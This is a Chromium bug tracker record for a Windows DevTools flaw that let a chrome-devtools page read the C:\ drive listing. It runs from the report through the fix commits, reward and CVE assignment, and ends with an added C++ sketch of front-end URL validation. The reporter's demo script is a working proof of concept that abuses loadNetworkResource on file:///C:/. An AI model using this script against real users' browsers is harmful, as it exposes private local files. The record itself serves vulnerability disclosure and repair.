
Issue metadata

Status: Verified
Owner:
Closed: Jan 2017
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: Windows
Pri: 1
Type: Bug-Security




Issue 662859: Security: chrome-devtools protocol allows reading the content of the C:\ drive

Reported by chromium...@gmail.com, Nov 7 2016

Issue description

VERSION
Chrome Version: 56.0.2912.0
Operating System: Win7

REPRODUCTION CASE
1. Navigate to chrome-devtools://devtools/remote/serve_rev/@199588/devtools.html
2. Navigate to the link below in chrome-dev.txt (on the same tab)
3. Observe

Demo Attack Script [pre-encoding]:

function f() {c='d="",DevToolsAPI.streamWrite=function(e,o){d+=o},DevToolsAPI.sendMessageToEmbedder("loadNetworkResource",["file:///C:/","",0],function(e){d.split("\\n").map(function(e){e.match(/addRow.*;/)&&document.write(e.match(/addRow.*;/)[0]);})});' ;document.write("<script>window.document.write('<script>'+c+'</scr'+'ipt>');</scr"+"ipt>");}if( typeof DevToolsHost == "undefined" ) location.reload();else f();
 
Attachments: chrome-dev.txt (1.7 KB), Recording.mp4 (838 KB)

Comment 1 by elawrence@chromium.org, Nov 7 2016

Components: Platform>DevTools
Looks very similar to 653134; I'm not sure how it differs?

Comment 2 by chromium...@gmail.com, Nov 7 2016

Yeah, but in this report I used the first step to repro.

Comment 3 by est...@chromium.org, Nov 7 2016

Labels: Security_Severity-High M-56 OS-Windows
Owner: dgozman@chromium.org
Status: Assigned (was: Unconfirmed)
Does this repro on stable or canary only? (I don't have a windows machine handy to check.)

Comment 4 by chromium...@gmail.com, Nov 7 2016

I couldn't repro this on 54.0.2840.87 (stable).

Comment 5 by nparker@chromium.org, Nov 8 2016

Labels: Security_Impact-Head

Comment 6 by sheriffbot@chromium.org, Nov 8 2016

Project Member
Labels: ReleaseBlock-Beta
This issue is a security regression. If you are not able to fix this quickly, please revert the change that introduced it.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 7 by sheriffbot@chromium.org, Nov 8 2016

Project Member
Labels: Pri-1

Comment 8 Deleted

Comment 9 by chromium...@gmail.com, Nov 15 2016

Any updates on this bug? thanks.

Comment 10 by sheriffbot@chromium.org, Nov 21 2016

Project Member
dgozman: Uh oh! This issue still open and hasn't been updated in the last 14 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers?

If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one?

If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started.

Thanks for your time! To disable nags, add the Disable-Nags label.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 11 by chromium...@gmail.com, Nov 30 2016

Dgozman@ Could you please take a look at this issue? - Thanks :).

Comment 12 by sheriffbot@chromium.org, Dec 2 2016

Project Member
Labels: -Security_Impact-Head Security_Impact-Beta

Comment 13 by sheriffbot@chromium.org, Dec 5 2016

Project Member
dgozman: Uh oh! This issue still open and hasn't been updated in the last 28 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers?

If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one?

If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started.

Thanks for your time! To disable nags, add the Disable-Nags label.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 14 by awhalley@google.com, Dec 7 2016

Labels: -ReleaseBlock-Beta -Security_Impact-Beta ReleaseBlock-Stable Security_Impact-Stable
Impact stable per #8

Comment 15 by chromium...@gmail.com, Dec 19 2016

This bug seems like it has been forgotten.

Comment 16 by dgozman@chromium.org, Dec 27 2016

Cc: caseq@chromium.org

Comment 17 by caseq@chromium.org, Dec 28 2016

Cc: -caseq@chromium.org dgozman@chromium.org
Owner: caseq@chromium.org
Status: Started (was: Assigned)
Note this is not a recent regression -- I've been able to reproduce this on m55 (stable) as well.

Comment 18 by bugdroid1@chromium.org, Dec 29 2016

Project Member
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/eea3300239f0b53e172a320eb8de59d0bea65f27

commit eea3300239f0b53e172a320eb8de59d0bea65f27
Author: caseq <caseq@chromium.org>
Date: Thu Dec 29 02:19:18 2016

DevTools: move front-end URL handling to DevToolsUIBindingds

BUG= 662859 

Review-Url: https://codereview.chromium.org/2607833002
Cr-Commit-Position: refs/heads/master@{#440926}

[modify] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/browser/devtools/BUILD.gn
[modify] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/browser/devtools/devtools_ui_bindings.cc
[modify] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/browser/devtools/devtools_ui_bindings.h
[rename] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/browser/devtools/devtools_ui_bindings_unittest.cc
[modify] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/browser/devtools/devtools_window.cc
[add] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/browser/devtools/url_constants.cc
[add] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/browser/devtools/url_constants.h
[modify] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/browser/ui/webui/devtools_ui.cc
[modify] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/browser/ui/webui/devtools_ui.h
[modify] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/test/BUILD.gn

Comment 19 by chromium...@gmail.com, Jan 2 2017

Verified on 57.0.2969.1 (Canary). Fixed.

Comment 20 by awhalley@chromium.org, Jan 2 2017

Status: Verified (was: Started)

Comment 21 by awhalley@chromium.org, Jan 2 2017

Labels: reward-topanel

Comment 22 by sheriffbot@chromium.org, Jan 3 2017

Project Member
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify

Comment 23 by sheriffbot@chromium.org, Jan 5 2017

Project Member
Labels: Merge-Request-56

Comment 24 by sheriffbot@chromium.org, Jan 5 2017

Project Member
Labels: -Merge-Request-56 Hotlist-Merge-Approved Merge-Approved-56
Your change meets the bar and is auto-approved for M56. Please go ahead and merge the CL manually. Please contact milestone owner if you have questions.
Owners: amineer@(clank), cmasso@(bling), gkihumba@(cros), bustamante@(desktop)

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 25 by caseq@chromium.org, Jan 6 2017

Cc: pfeldman@chromium.org

Comment 26 by bugdroid1@chromium.org, Jan 11 2017

Project Member
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/714ce74842af647ab192124910b08a07ee7d606b

commit 714ce74842af647ab192124910b08a07ee7d606b
Author: caseq <caseq@chromium.org>
Date: Wed Jan 11 01:31:09 2017

Revert of DevTools: move front-end URL handling to DevToolsUIBindingds (patchset #2 id:40001 of https://codereview.chromium.org/2607833002/ )

Reason for revert:
A better fix is coming, reverting this one to make it a part of the new fix so that one CL may be merged onto a branch.

Original issue's description:
> DevTools: move front-end URL handling to DevToolsUIBindingds
>
> BUG= 662859 
>
> Committed: https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27
> Cr-Commit-Position: refs/heads/master@{#440926}

TBR=dgozman@chromium.org
# Not skipping CQ checks because original CL landed more than 1 days ago.
BUG= 662859 

Review-Url: https://codereview.chromium.org/2620193002
Cr-Commit-Position: refs/heads/master@{#442758}

[modify] https://crrev.com/714ce74842af647ab192124910b08a07ee7d606b/chrome/browser/devtools/BUILD.gn
[modify] https://crrev.com/714ce74842af647ab192124910b08a07ee7d606b/chrome/browser/devtools/devtools_ui_bindings.cc
[modify] https://crrev.com/714ce74842af647ab192124910b08a07ee7d606b/chrome/browser/devtools/devtools_ui_bindings.h
[modify] https://crrev.com/714ce74842af647ab192124910b08a07ee7d606b/chrome/browser/devtools/devtools_window.cc
[delete] https://crrev.com/451daad4f60a3ca0f7508097309d11a15da480fe/chrome/browser/devtools/url_constants.cc
[delete] https://crrev.com/451daad4f60a3ca0f7508097309d11a15da480fe/chrome/browser/devtools/url_constants.h
[modify] https://crrev.com/714ce74842af647ab192124910b08a07ee7d606b/chrome/browser/ui/webui/devtools_ui.cc
[modify] https://crrev.com/714ce74842af647ab192124910b08a07ee7d606b/chrome/browser/ui/webui/devtools_ui.h
[rename] https://crrev.com/714ce74842af647ab192124910b08a07ee7d606b/chrome/browser/ui/webui/devtools_ui_unittest.cc
[modify] https://crrev.com/714ce74842af647ab192124910b08a07ee7d606b/chrome/test/BUILD.gn

Comment 27 by bugdroid1@chromium.org, Jan 11 2017

Project Member
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/c2db881506f5709433a5bf6ed981b1bc0c860598

commit c2db881506f5709433a5bf6ed981b1bc0c860598
Author: caseq <caseq@chromium.org>
Date: Wed Jan 11 03:39:32 2017

Fix front-end host creation upon navigation

- when navigating, add host bindings to the pending frame rather than old frame;
- force renderer swap if front-end URL is invalid;
- move front-end URL validation to DevToolsUIBindingds

This also re-lands https://codereview.chromium.org/2607833002

BUG= 662859 , 678035 

Review-Url: https://codereview.chromium.org/2620153002
Cr-Commit-Position: refs/heads/master@{#442781}

[modify] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/devtools/BUILD.gn
[modify] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/devtools/devtools_ui_bindings.cc
[modify] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/devtools/devtools_ui_bindings.h
[rename] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/devtools/devtools_ui_bindings_unittest.cc
[modify] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/devtools/devtools_window.cc
[add] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/devtools/url_constants.cc
[add] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/devtools/url_constants.h
[modify] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/ui/webui/chrome_web_ui_controller_factory.cc
[modify] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/ui/webui/devtools_ui.cc
[modify] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/ui/webui/devtools_ui.h
[modify] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/test/BUILD.gn

Comment 28 by awhalley@chromium.org, Jan 12 2017

Labels: -reward-topanel reward-3000 reward-unpaid
Greetings!  The panel took a look at this and decided to reward $3,000!  Please note that's only because this bug can be triggered from an untrusted extension. The amount of user interaction required in the bug as reported would have made it unlikely to receive a reward.

Comment 29 by chromium...@gmail.com, Jan 12 2017

Thanks Andrew! :)

Comment 30 by awhalley@chromium.org, Jan 17 2017

Hi caseq@ - mind doing the merge to M56?

Comment 31 by awhalley@chromium.org, Jan 17 2017

Labels: -reward-unpaid reward-inprocess

Comment 32 by bugdroid1@chromium.org, Jan 24 2017

Project Member
Labels: -merge-approved-56 merge-merged-2924
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/d6f1c251f409263302a2df863df61314418dc4b2

commit d6f1c251f409263302a2df863df61314418dc4b2
Author: Andrey Kosyakov <caseq@chromium.org>
Date: Tue Jan 24 03:21:21 2017

Fix front-end host creation upon navigation

- when navigating, add host bindings to the pending frame rather than old frame;
- force renderer swap if front-end URL is invalid;
- move front-end URL validation to DevToolsUIBindingds

This also re-lands https://codereview.chromium.org/2607833002

BUG= 662859 , 678035 

Review-Url: https://codereview.chromium.org/2620153002
Cr-Commit-Position: refs/heads/master@{#442781}
(cherry picked from commit c2db881506f5709433a5bf6ed981b1bc0c860598)

Review-Url: https://codereview.chromium.org/2653783003 .
Cr-Commit-Position: refs/branch-heads/2924@{#853}
Cr-Branched-From: 3a87aecc31cd1ffe751dd72c04e5a96a1fc8108a-refs/heads/master@{#433059}

[modify] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/devtools/BUILD.gn
[modify] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/devtools/devtools_ui_bindings.cc
[modify] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/devtools/devtools_ui_bindings.h
[rename] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/devtools/devtools_ui_bindings_unittest.cc
[modify] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/devtools/devtools_window.cc
[add] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/devtools/url_constants.cc
[add] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/devtools/url_constants.h
[modify] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/ui/webui/chrome_web_ui_controller_factory.cc
[modify] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/ui/webui/devtools_ui.cc
[modify] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/ui/webui/devtools_ui.h
[modify] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/test/BUILD.gn

Comment 33 by awhalley@chromium.org, Jan 24 2017

Labels: Release-0-M56

Comment 34 by awhalley@chromium.org, Jan 24 2017

Labels: -ReleaseBlock-Stable

Comment 35 by awhalley@chromium.org, Jan 25 2017

Labels: CVE-2017-5011

Comment 36 by sheriffbot@chromium.org, Apr 11 2017

Project Member
Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 37 by bugdroid1@chromium.org, Nov 15 2017

Project Member
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/484f731aaead5d72c26a21ea012cd2a706146f19

commit 484f731aaead5d72c26a21ea012cd2a706146f19
Author: Andrey Kosyakov <caseq@chromium.org>
Date: Wed Nov 15 18:35:06 2017

DevTools: validate remote front-end URLs

- validate a remote front-end URL before fetching it;
- only expose bindings in window if opener has bindings or there's
    no opener.

Bug:  662859 
Change-Id: I3a5619b78dbd29dc730f37d704a212ecad8bbb54
Reviewed-on: https://chromium-review.googlesource.com/770511
Reviewed-by: Dmitry Gozman <dgozman@chromium.org>
Commit-Queue: Andrey Kosyakov <caseq@chromium.org>
Cr-Commit-Position: refs/heads/master@{#516756}
[modify] https://crrev.com/484f731aaead5d72c26a21ea012cd2a706146f19/chrome/browser/devtools/devtools_ui_bindings.cc
[modify] https://crrev.com/484f731aaead5d72c26a21ea012cd2a706146f19/chrome/browser/devtools/devtools_ui_bindings.h
[modify] https://crrev.com/484f731aaead5d72c26a21ea012cd2a706146f19/chrome/browser/ui/webui/devtools_ui.cc
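The commit above states that a remote front-end URL is validated before it is fetched, and the earlier fix (comment 27) moved that validation into DevToolsUIBindings. The following is an added C++ illustration of what such a pre-fetch allowlist check looks like; it is not Chromium's code and the exact rules Chromium applies are not on this page. Assumptions: the allowlisted host `devtools-frontend.example` is a constructed placeholder, and the accepted path shape `/serve_rev/@<revision>/<file>.html` is inferred from the URL in the report. The check rejects anything that is not https, any host outside the allowlist, userinfo or port tricks in the authority, non-hex revisions, and `.` / `..` path segments, so a `file:` URL like the one in the demo script never reaches the fetch step.

```cpp
#include <cassert>
#include <cctype>
#include <iostream>
#include <string>
#include <vector>

// Constructed allowlist of hosts a remote DevTools front-end may be loaded
// from. Placeholder domain, not Chromium's real configuration.
static const std::vector<std::string> kAllowedFrontendHosts = {
    "devtools-frontend.example"};

static std::string ToLower(std::string s) {
  for (char& c : s)
    c = static_cast<char>(std::tolower(static_cast<unsigned char>(c)));
  return s;
}

struct ParsedUrl {
  bool ok = false;
  std::string scheme;
  std::string host;
  std::string path;  // without query or fragment
};

// Minimal splitter for "scheme://host/path?query#fragment". Rejects userinfo
// ("@") and explicit ports so a different authority cannot be smuggled past
// the host allowlist.
static ParsedUrl ParseUrl(const std::string& url) {
  ParsedUrl p;
  const size_t sep = url.find("://");
  if (sep == std::string::npos) return p;
  p.scheme = ToLower(url.substr(0, sep));
  const size_t host_begin = sep + 3;
  const size_t slash = url.find('/', host_begin);
  const std::string host = (slash == std::string::npos)
                               ? url.substr(host_begin)
                               : url.substr(host_begin, slash - host_begin);
  if (host.empty() || host.find('@') != std::string::npos ||
      host.find(':') != std::string::npos)
    return p;
  p.host = ToLower(host);
  p.path = (slash == std::string::npos) ? "/" : url.substr(slash);
  const size_t cut = p.path.find_first_of("?#");
  if (cut != std::string::npos) p.path.erase(cut);
  p.ok = true;
  return p;
}

static bool IsHexRevision(const std::string& s) {
  if (s.empty()) return false;
  for (char c : s)
    if (!std::isxdigit(static_cast<unsigned char>(c))) return false;
  return true;
}

// Accepts only https://<allowlisted host>/serve_rev/@<hex>/<file>.html with no
// empty, "." or ".." path segments. Everything else (file:, http:, other
// hosts, traversal) is rejected before any fetch happens.
bool IsValidRemoteFrontendUrl(const std::string& url) {
  const ParsedUrl p = ParseUrl(url);
  if (!p.ok || p.scheme != "https") return false;
  bool host_ok = false;
  for (const auto& h : kAllowedFrontendHosts) host_ok = host_ok || (h == p.host);
  if (!host_ok) return false;

  const std::string prefix = "/serve_rev/@";
  if (p.path.compare(0, prefix.size(), prefix) != 0) return false;
  const size_t rev_end = p.path.find('/', prefix.size());
  if (rev_end == std::string::npos) return false;
  if (!IsHexRevision(p.path.substr(prefix.size(), rev_end - prefix.size())))
    return false;

  // Walk every remaining path segment; reject empty, "." and "..".
  size_t start = rev_end + 1;
  while (start <= p.path.size()) {
    size_t end = p.path.find('/', start);
    if (end == std::string::npos) end = p.path.size();
    const std::string seg = p.path.substr(start, end - start);
    if (seg.empty() || seg == "." || seg == "..") return false;
    start = end + 1;
  }
  const std::string suffix = ".html";
  return p.path.size() >= suffix.size() &&
         p.path.compare(p.path.size() - suffix.size(), suffix.size(), suffix) == 0;
}

int main() {
  // Constructed sample inputs: one legitimate front-end URL, then rejects.
  const char* samples[] = {
      "https://devtools-frontend.example/serve_rev/@199588/devtools.html",
      "file:///C:/",
      "https://devtools-frontend.example/serve_rev/@199588/../../x.html"};
  for (const char* s : samples)
    std::cout << (IsValidRemoteFrontendUrl(s) ? "allow " : "reject ") << s << "\n";
  return 0;
}
```

The validation is deliberately an allowlist rather than a blocklist of bad schemes: the bug class here is a privileged front-end receiving bindings it should not have, so the safe default is to refuse anything that is not a known-good origin and path shape.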

Comment 38 by awhalley@chromium.org, Apr 25 2018

Labels: CVE_description-submitted
